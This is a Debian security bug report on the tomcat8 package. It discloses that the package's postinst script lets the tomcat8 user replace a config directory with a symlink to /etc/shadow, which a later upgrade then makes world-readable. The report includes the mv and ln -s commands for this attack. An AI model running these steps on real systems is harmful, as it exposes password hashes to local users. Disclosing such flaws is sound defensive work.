Package: tomcat8
Version: 8.0.14-1+deb8u4
Severity: critical
Tags: security

Having installed tomcat8, the directory /etc/tomcat8/Catalina is set
writable by group tomcat8, as per the postinst script. Then the tomcat8
user, in the situation envisaged in DSA-3670 and DSA-3720, see also
could use something like commands
  mv -i /etc/tomcat8/Catalina/localhost /etc/tomcat8/Catalina/localhost-OLD
  ln -s /etc/shadow /etc/tomcat8/Catalina/localhost
to create a symlink:
  # ls -l /etc/tomcat8/Catalina/localhost
  lrwxrwxrwx 1 tomcat8 tomcat8 11 Nov 23 10:19 /etc/tomcat8/Catalina/localhost 
-> /etc/shadow
Then when the tomcat8 package is upgraded (e.g. for the next DSA),
the postinst script runs
  chmod 775 /etc/tomcat8/Catalina /etc/tomcat8/Catalina/localhost
and that will make the /etc/shadow file world-readable (and
group-writable). Other useful attacks might be to make the objects:
world-readable; or make something (already owned by group tomcat8)
group-writable (some "policy" setting maybe?).

Cheers, Paul

Paul Szabo
School of Mathematics and Statistics   University of Sydney    Australia

This is the maintainer address of Debian's Java team
Please use for discussions and questions.

Reply via email to